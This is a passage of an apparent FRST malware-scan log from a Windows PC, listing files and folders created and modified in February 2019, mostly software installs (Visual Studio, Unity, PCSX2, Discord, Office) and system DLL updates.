2019-02-20 22:03 - 2019-02-20 22:03 - 000000003 _____ C:\Users\Michael\AppData\Local\wbem.ini
2019-02-20 21:59 - 2019-02-20 22:08 - 000000000 ____D C:\Program Files (x86)\Video
2019-02-20 21:51 - 2019-02-20 21:51 - 000000000 ____D C:\ProgramData\{B3627947-F7BF-ABF0-C7EA-7327C70D2A76}
2019-02-20 21:51 - 2019-02-20 21:51 - 000000000 ____D C:\ProgramData\{1CDD8693-086B-044F-1315-CC8813F295D9}
2019-02-20 21:50 - 2019-02-21 17:48 - 000000000 ____D C:\Users\Michael\Desktop\PCSX2 1.4.0
2019-02-20 21:48 - 2019-02-20 21:48 - 000000000 ____D C:\Program Files\WinRAR
2019-02-20 21:44 - 2019-02-20 21:47 - 003141416 _____ (Alexander Roshal) C:\Users\Michael\Downloads\winrar-x64-57b1.exe
2019-02-20 21:39 - 2019-02-20 21:39 - 002211051 _____ C:\Users\Michael\Downloads\scph10000.zip
2019-02-20 21:02 - 2019-02-20 21:14 - 000000178 _____ C:\Users\Michael\Desktop\PCSX2 Best Configuration.txt
2019-02-20 20:36 - 2019-02-20 20:36 - 000000000 ____D C:\Users\Michael\Documents\PCSX2
2019-02-20 20:19 - 2019-02-20 20:20 - 000000000 ____D C:\Program Files (x86)\PCSX2 1.4.0
2019-02-20 20:19 - 2019-02-20 20:19 - 000001943 _____ C:\Users\Public\Desktop\PCSX2 1.4.0.lnk
2019-02-20 20:19 - 2019-02-20 20:19 - 000000000 ____D C:\Windows\SysWOW64\directx
2019-02-20 20:19 - 2019-02-20 20:19 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PCSX2
2019-02-20 20:14 - 2019-02-20 20:15 - 017837152 _____ C:\Users\Michael\Downloads\pcsx2-1.4.0-setup.exe
2019-02-20 18:32 - 2019-02-23 21:06 - 000000000 ____D C:\Users\Michael\AppData\Roaming\Discord
2019-02-20 18:32 - 2019-02-20 18:32 - 000002136 _____ C:\Users\Michael\Desktop\Discord.lnk
2019-02-20 18:32 - 2019-02-20 18:32 - 000000000 ____D C:\Users\Michael\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Discord Inc
2019-02-20 18:32 - 2019-02-20 18:32 - 000000000 ____D C:\Users\Michael\AppData\Local\SquirrelTemp
2019-02-20 18:32 - 2019-02-20 18:32 - 000000000 ____D C:\Users\Michael\AppData\Local\Discord
2019-02-20 03:33 - 2019-02-20 03:33 - 000096393 _____ C:\Windows\uninstaller.dat
2019-02-02 19:20 - 2019-02-15 22:48 - 000001590 _____ C:\Users\Public\Desktop\DOSBox 0.74.lnk
2019-02-02 19:20 - 2019-02-15 22:48 - 000000000 ____D C:\DOSBox-0.74
2019-02-02 19:20 - 2019-02-02 19:37 - 000000000 ____D C:\Users\Michael\AppData\Local\DOSBox
2019-02-02 19:20 - 2019-02-02 19:20 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DOSBox-0.74
2019-02-02 19:01 - 2019-02-02 19:11 - 000000000 ____D C:\ProgramData\Unity
2019-02-02 19:01 - 2019-02-02 19:01 - 000000000 ____D C:\Users\Michael\AppData\Roaming\Unity
2019-02-02 19:01 - 2019-02-02 19:01 - 000000000 ____D C:\Users\Michael\AppData\LocalLow\Unity
2019-02-02 19:01 - 2019-02-02 19:01 - 000000000 ____D C:\Users\Michael\AppData\Local\Unity
2019-02-02 14:50 - 2019-02-02 14:50 - 000000000 ____D C:\Users\Michael\AppData\Roaming\Adobe
2019-02-02 14:50 - 2019-02-02 14:50 - 000000000 ____D C:\Users\Michael\AppData\LocalLow\Adobe
2019-02-02 14:47 - 2019-02-15 22:46 - 000004476 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task
2019-02-02 14:46 - 2019-02-23 21:06 - 000002441 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2019-02-02 14:46 - 2019-02-06 19:31 - 000000000 ____D C:\ProgramData\Adobe
2019-02-02 14:46 - 2019-02-02 14:46 - 000000000 ____D C:\Program Files (x86)\Adobe
2019-02-02 14:38 - 2019-02-02 14:50 - 000000000 ____D C:\Users\Michael\AppData\Local\Adobe
2019-02-02 13:45 - 2019-02-02 13:45 - 000008192 _____ C:\Windows\SysWOW64\srvany.exe
2019-02-02 13:42 - 2019-02-02 13:42 - 000000000 ____D C:\Windows\System32\Tasks\OfficeSoftwareProtectionPlatform
2019-02-02 13:42 - 2019-02-02 13:42 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SharePoint
2019-02-02 13:42 - 2019-02-02 13:42 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office
2019-02-02 13:42 - 2019-02-02 13:42 - 000000000 ____D C:\Program Files\Microsoft Synchronization Services
2019-02-02 13:42 - 2019-02-02 13:42 - 000000000 ____D C:\Program Files\Common Files\DESIGNER
2019-02-02 13:41 - 2019-02-02 13:41 - 000000000 ____D C:\Windows\PCHEALTH
2019-02-02 13:41 - 2019-02-02 13:41 - 000000000 ____D C:\Program Files\Microsoft Sync Framework
2019-02-02 13:41 - 2019-02-02 13:41 - 000000000 ____D C:\Program Files\Microsoft SQL Server Compact Edition
2019-02-02 13:40 - 2019-02-02 13:41 - 000000000 ____D C:\Program Files\Microsoft Office
2019-02-02 13:40 - 2019-02-02 13:40 - 000000000 ____D C:\Users\Michael\AppData\Local\Microsoft Help
2019-02-02 13:40 - 2019-02-02 13:40 - 000000000 ____D C:\Program Files\Microsoft Analysis Services
2019-02-02 13:40 - 2019-02-02 13:40 - 000000000 ____D C:\Program Files (x86)\Microsoft Visual Studio 8
2019-02-02 13:40 - 2019-02-02 13:40 - 000000000 ____D C:\Program Files (x86)\Microsoft Office
2019-02-02 13:40 - 2019-02-02 13:40 - 000000000 ____D C:\Program Files (x86)\Microsoft Analysis Services
2019-02-02 13:39 - 2019-02-02 13:39 - 000000000 __RHD C:\MSOCache
2019-02-02 13:09 - 2019-02-02 13:09 - 000000000 ____D C:\Users\Michael\AppData\Roaming\JCreator
2019-02-02 13:09 - 2019-02-02 13:09 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\JCreator LE
2019-02-02 13:09 - 2019-02-02 13:09 - 000000000 ____D C:\ProgramData\JCreator
2019-02-02 13:09 - 2019-02-02 13:09 - 000000000 ____D C:\Program Files (x86)\Xinox Software
2019-02-02 13:01 - 2019-02-02 13:01 - 000000000 ____D C:\Users\Michael\AppData\LocalLow\Oracle
2019-02-02 13:01 - 2019-02-02 13:01 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java Development Kit
2019-02-02 13:00 - 2019-02-02 13:06 - 000000000 ____D C:\ProgramData\Oracle
2019-02-02 13:00 - 2019-02-02 13:01 - 000166248 _____ (Oracle Corporation) C:\Windows\system32\WindowsAccessBridge-64.dll
2019-02-02 13:00 - 2019-02-02 13:01 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2019-02-02 13:00 - 2019-02-02 13:01 - 000000000 ____D C:\Program Files\Java
2019-02-02 13:00 - 2019-02-02 13:00 - 000000000 ____D C:\Users\Michael\AppData\Roaming\Sun
2019-02-02 13:00 - 2019-02-02 13:00 - 000000000 ____D C:\Users\Michael\AppData\LocalLow\Sun
2019-02-02 12:42 - 2019-02-02 12:42 - 000000000 ____D C:\Users\Michael\AppData\LocalLow\Temp
2019-02-02 12:41 - 2019-02-02 12:41 - 000000000 ____D C:\Users\Michael\AppData\Roaming\NuGet
2019-02-02 12:34 - 2019-02-02 12:34 - 000001471 _____ C:\Users\Michael\Desktop\Visual Studio 2017.lnk
2019-02-02 12:32 - 2019-02-02 12:32 - 000000000 ____D C:\Users\Michael\source
2019-02-02 12:32 - 2019-02-02 12:32 - 000000000 ____D C:\Users\Michael\AppData\Roaming\Microsoft Corporation
2019-02-02 12:32 - 2019-02-02 12:32 - 000000000 ____D C:\Users\Michael\AppData\Local\Xamarin
2019-02-02 12:30 - 2019-02-02 12:36 - 000000000 ____D C:\Users\Michael\AppData\Local\.IdentityService
2019-02-02 11:33 - 2019-02-02 12:41 - 000000000 ____D C:\Users\Michael\Documents\Visual Studio 2017
2019-02-02 11:24 - 2019-02-02 11:24 - 000000000 ____D C:\Users\Michael\.cordova
2019-02-02 11:24 - 2019-02-02 11:24 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Unity 2018.3.0f2 (64-bit)
2019-02-02 11:22 - 2019-02-02 11:22 - 000000000 ____D C:\Program Files\Unity
2019-02-02 09:44 - 2019-02-02 09:44 - 000000000 ____D C:\Users\Michael\.android
2019-02-02 09:44 - 2019-02-02 09:44 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Visual Studio 2017 Tools for Unity
2019-02-02 09:44 - 2019-02-02 09:44 - 000000000 ____D C:\Program Files (x86)\Microsoft Visual Studio Tools for Unity
2019-02-02 08:53 - 2019-02-02 08:53 - 000000000 ____D C:\Program Files (x86)\Android
2019-02-02 08:52 - 2019-02-02 08:52 - 000000000 ____D C:\Program Files\Android
2019-02-02 08:41 - 2019-02-02 08:41 - 000000000 ____D C:\Program Files (x86)\Xamarin
2019-02-02 07:57 - 2019-02-02 07:57 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Azure
2019-02-02 07:57 - 2019-02-02 07:57 - 000000000 ____D C:\ProgramData\dftmp
2019-02-02 07:57 - 2019-02-02 07:57 - 000000000 ____D C:\Program Files\VS2012Schemas
2019-02-02 07:57 - 2019-02-02 07:57 - 000000000 ____D C:\Program Files\VS2010Schemas
2019-02-02 07:57 - 2019-02-02 07:57 - 000000000 ____D C:\Program Files\Microsoft SDKs
2019-02-02 07:57 - 2019-02-02 07:57 - 000000000 ____D C:\Program Files\IIS
2019-02-02 07:57 - 2019-02-02 07:57 - 000000000 ____D C:\Program Files (x86)\IIS
2019-02-02 07:37 - 2019-02-02 07:37 - 000000000 ____D C:\Program Files (x86)\Windows Phone Kits
2019-02-02 06:31 - 2019-02-02 06:31 - 000000000 ____D C:\ProgramData\Windows App Certification Kit
2019-02-02 06:30 - 2019-02-02 06:31 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Kits
2019-02-02 06:30 - 2019-02-02 06:30 - 000000000 ____D C:\Program Files\Application Verifier
2019-02-02 06:30 - 2019-02-02 06:30 - 000000000 ____D C:\Program Files (x86)\Application Verifier
2019-02-02 03:17 - 2019-02-02 03:17 - 000000000 ____D C:\Program Files\Windows Kits
2019-02-02 02:37 - 2019-02-02 02:37 - 005549504 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2019-02-02 02:37 - 2019-02-02 02:37 - 003969472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2019-02-02 02:37 - 2019-02-02 02:37 - 003914176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2019-02-02 02:37 - 2019-02-02 02:37 - 001732032 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 001292192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 001161216 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 001114112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kernel32.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000878080 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000859648 _____ (Microsoft Corporation) C:\Windows\system32\tdh.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000640512 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000619520 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tdh.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000424448 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000362496 _____ (Microsoft Corporation) C:\Windows\system32\wow64win.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000338432 _____ (Microsoft Corporation) C:\Windows\system32\conhost.exe
2019-02-02 02:37 - 2019-02-02 02:37 - 000274944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000243712 _____ (Microsoft Corporation) C:\Windows\system32\wow64.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000215040 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000112640 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2019-02-02 02:37 - 2019-02-02 02:37 - 000043520 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\setup16.exe
2019-02-02 02:37 - 2019-02-02 02:37 - 000016384 _____ (Microsoft Corporation) C:\Windows\system32\ntvdm64.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntvdm64.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000013312 _____ (Microsoft Corporation) C:\Windows\system32\wow64cpu.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\instnm.exe
2019-02-02 02:37 - 2019-02-02 02:37 - 000006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apisetschema.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000006144 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-security-base-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000006144 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-security-base-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000005120 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000005120 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wow32.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-threadpool-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processthreads-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-threadpool-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-sysinfo-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-synch-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-misc-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localregistry-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localization-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-sysinfo-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localregistry-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-xstate-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processenvironment-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-memory-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-heap-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-rtlsupport-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processenvironment-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-namedpipe-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-misc-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-memory-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-libraryloader-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-heap-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-util-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-string-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-rtlsupport-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-profile-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-io-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-handle-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-fibers-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-errorhandling-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-delayload-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-debug-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-datetime-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-console-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-util-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-string-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-profile-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-io-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-interlocked-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-handle-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-fibers-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-errorhandling-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-delayload-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-debug-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-datetime-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-console-l1-1-0.dll
2019-02-02 02:37 - 2019-02-02 02:37 - 000002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user.exe
2019-02-02 02:37 - 2019-02-02 02:37 - 000000000 ____D C:\Program Files (x86)\Microsoft Web Tools
2019-02-02 01:08 - 2019-02-02 02:37 - 000000000 ____D C:\Program Files\IIS Express
2019-02-02 01:08 - 2019-02-02 02:37 - 000000000 ____D C:\Program Files (x86)\IIS Express
2019-02-02 01:07 - 2019-02-02 01:07 - 000000000 ____D C:\Program Files\Microsoft ASP.NET Core Runtime Package Store
2019-02-02 00:52 - 2019-02-02 00:52 - 000000000 ____D C:\Program Files (x86)\NuGet
2019-02-02 00:51 - 2019-02-02 01:07 - 000000000 ____D C:\Program Files\dotnet
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\3082
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\2052
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\1055
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\1049
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\1046
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\1045
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\1042
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\1041
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\1040
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\1036
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\1033
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\1031
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\1029
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\SysWOW64\1028
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\3082
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\2052
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\1055
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\1049
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\1046
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\1045
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\1042
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\1041
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\1040
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\1036
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\1033
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\1031
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\1029
2019-02-01 23:52 - 2019-02-02 03:13 - 000000000 ____D C:\Windows\system32\1028
2019-02-01 23:52 - 2019-02-01 23:52 - 000000000 ____D C:\Program Files (x86)\Entity Framework Tools
2019-02-01 23:47 - 2019-02-01 23:47 - 000001715 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Blend for Visual Studio 2017.lnk
2019-02-01 21:36 - 1998-10-29 16:45 - 000306688 _____ (InstallShield Software Corporation) C:\Windows\IsUninst.exe
2019-02-01 20:50 - 2019-02-01 20:50 - 000000000 ____D C:\Users\Michael\AppData\Roaming\Steam
2019-02-01 20:50 - 2019-02-01 20:50 - 000000000 ____D C:\Users\Michael\AppData\Local\CAPCOM
2019-02-01 20:42 - 2019-02-02 02:37 - 000000000 ____D C:\Program Files\Microsoft SQL Server
2019-02-01 20:41 - 2019-02-02 02:37 - 000000000 ____D C:\Program Files (x86)\Microsoft SQL Server
2019-02-01 20:36 - 2019-02-18 20:43 - 000001099 _____ C:\Users\Michael\Desktop\Resident Evil HD Remaster.lnk
2019-02-01 20:32 - 2019-02-01 20:32 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Resident Evil HD Remaster
2019-02-01 20:26 - 2019-02-01 20:36 - 000000000 ____D C:\Program Files (x86)\Resident Evil HD Remaster
2019-02-01 20:23 - 2019-02-01 20:23 - 000003246 _____ C:\Windows\System32\Tasks\SidebarExecute
2019-02-01 19:56 - 1999-12-12 00:00 - 1706336256 _____ C:\Users\Michael\Desktop\RDN-E-RMSTRHD-CompucaliTV.iso
2019-02-01 18:28 - 2019-02-02 07:57 - 000000000 ____D C:\Program Files (x86)\Microsoft SDKs
2019-02-01 18:28 - 2019-02-02 06:30 - 000000000 ____D C:\Program Files (x86)\Windows Kits
2019-02-01 18:26 - 2019-02-01 18:26 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Visual Studio 2017
2019-02-01 18:25 - 2019-02-01 18:25 - 000001471 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Visual Studio 2017.lnk
2019-02-01 18:12 - 2019-02-02 07:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2019-02-01 18:12 - 2019-02-01 18:12 - 004296704 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_47.dll
2019-02-01 18:12 - 2019-02-01 18:12 - 003550208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_47.dll
2019-02-01 18:10 - 2019-02-01 22:59 - 000001286 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Visual Studio Installer.lnk
2019-02-01 18:09 - 2019-02-02 12:27 - 000000000 ____D C:\Users\Michael\AppData\Roaming\Visual Studio Setup
2019-02-01 18:09 - 2019-02-01 23:31 - 000000000 ____D C:\Program Files (x86)\Microsoft Visual Studio
2019-02-01 18:09 - 2019-02-01 18:09 - 000000000 ____D C:\Users\Michael\AppData\Roaming\vstelemetry
2019-02-01 18:09 - 2019-02-01 18:09 - 000000000 ____D C:\Users\Michael\AppData\Roaming\Microsoft Visual Studio
2019-02-01 18:09 - 2019-02-01 18:09 - 000000000 ____D C:\Users\Michael\AppData\Local\ServiceHub
2019-02-01 18:05 - 2019-02-01 18:05 - 000000000 ____D C:\ProgramData\Microsoft Visual Studio

==================== One month (modified) ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2019-03-01 13:40 - 2009-07-13 23:45 - 000026352 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
